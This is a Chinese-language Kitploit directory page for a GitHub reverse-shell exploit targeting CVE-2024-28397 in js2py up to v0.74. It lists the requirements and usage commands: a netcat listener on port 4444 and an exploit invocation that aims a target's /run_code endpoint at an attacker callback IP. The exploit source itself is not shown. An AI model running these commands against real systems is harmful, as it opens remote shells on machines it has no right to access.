Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-28397-Reverse-Shell — CVE-2024-28397的反向shell。 | Kitploit
工具/GitHubGitHub/somisec/cve-2024-28397-reverse-shell
Payload生成漏洞利用ShellcodeWeb应用程序漏洞利用远程访问工具
GitHubsomisec/cve-2024-28397-reverse-shell

CVE-2024-28397-Reverse-Shell

CVE-2024-28397的反向shell。

查看仓库
1211个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-28397-反弹Shell

针对CVE-2024-28397的反弹Shell。

漏洞利用适用于 js2py <= v0.74

要求

  • requests库(pip install requests)
  • Python3
  • Netcat(或可用于监听反弹Shell的工具)

使用方法

监听端
root@kitploit:~
nc -lnvp 4444
利用端
root@kitploit:~
python3 exploit.py 10.129.66.160 8000 /run_code --local_ip 10.10.15.11 --local_port 4444 
下载工具